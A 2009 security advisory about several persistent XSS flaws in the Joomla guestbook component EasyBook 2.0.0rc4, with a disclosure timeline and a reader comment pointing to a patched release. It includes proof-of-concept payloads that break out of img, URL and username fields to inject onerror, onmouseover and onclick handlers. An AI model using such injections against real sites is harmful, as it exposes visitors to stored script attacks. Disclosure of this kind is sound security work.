Thursday, 17 September 2009 00:00

The Joomla component EasyBook 2.0.0rc4 suffers from multiple persistent XSS vulnerabilities. One seems fairly critical, while the others would take some incredible creativity to actively exploit.

  1. BBCode XSS

    Settings:

    • Allow BBCode - on (default)
    • Allow Pictures - on (not default)
    [img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
  2. Website URL XSS

    Settings:

    • Show web site field: Show (default)
    foo.com" onmouseover="alert(String.fromCharCode(88,83,83));return false;

    Requires minimal user interaction

  3. Skype/Yahoo Username XSS

    Very narrow scope, as entries are truncated. XSS still technically possible. Requires user interaction.

    ' onclick="alert('XSS')"
  4. AIM/MSN Username XSS

    Again, narrow scope. See 3.

    " onclick="alert('xss')"

    ICQ username is similar, but scope seems too narrow to exploit.

Timeline

  • Vulnerabilities Discovered: 10 July 2009
  • Vendor Notified: 10 July 2009
  • Vendor Response: 13 July 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:37
 
Comments (1)
1 Tuesday, 20 July 2010 09:09
Viktor
Easybook Reloaded released!

This version includes security updates and bug fixes!

Download and information: http://www.kubik-rubik.de/joomla-hilfe/komponente-easybook-2-reloaded-joomla

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions